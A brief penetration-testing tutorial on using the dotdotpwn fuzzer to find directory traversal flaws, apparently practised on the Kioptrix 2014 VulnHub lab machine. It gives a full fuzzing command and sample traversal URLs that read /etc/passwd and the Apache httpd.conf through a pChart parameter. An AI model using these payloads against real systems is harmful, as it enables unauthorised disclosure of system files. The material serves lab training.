So you have researched your web app and have found that it is possible that it is vulnerable to directory traversal attacks. Very often the path to the initial point of the directory traversal is given in the exploit guide. If it isn’t however you can potentially use the dotdotpwn script to find a potential directory traversal.
For example:
cd /usr/share/dotdotpwn dotdotpwn -m http-url -u http://(IPorDomainName)/examples/index.php?Action=View\&Script=/TRAVERSAL -k "root:" -o unix
-m sets the module to be http-url
-u gives the URL to be tested. The word TRAVERSAL is used in the script for the start point of the testing.
-k searches for the word “root”
-o sets the operating system to unix, this information should be available from the NMap scan of the target.
Running this will dotdotpwn to fuzz through a number of options to find directories that can be traversed to. For example:
http://192.168.56.102/pChart2.1.3/examples/index.php?Action=View&Script=/../usr/local/etc/apache22/httpd.conf
http://192.168.56.102/pChart2.1.3/examples/index.php?Action=View&Script=/../etc/passwd
The examples above can be found by attacking the Kioptrix 2014 vulnerable machine on vulnhub.
For further information on dotdotpwn:
https://github.com/wireghoul/dotdotpwn
or run the following command in the terminal for the help menu
perl dotdotpwn.pl -h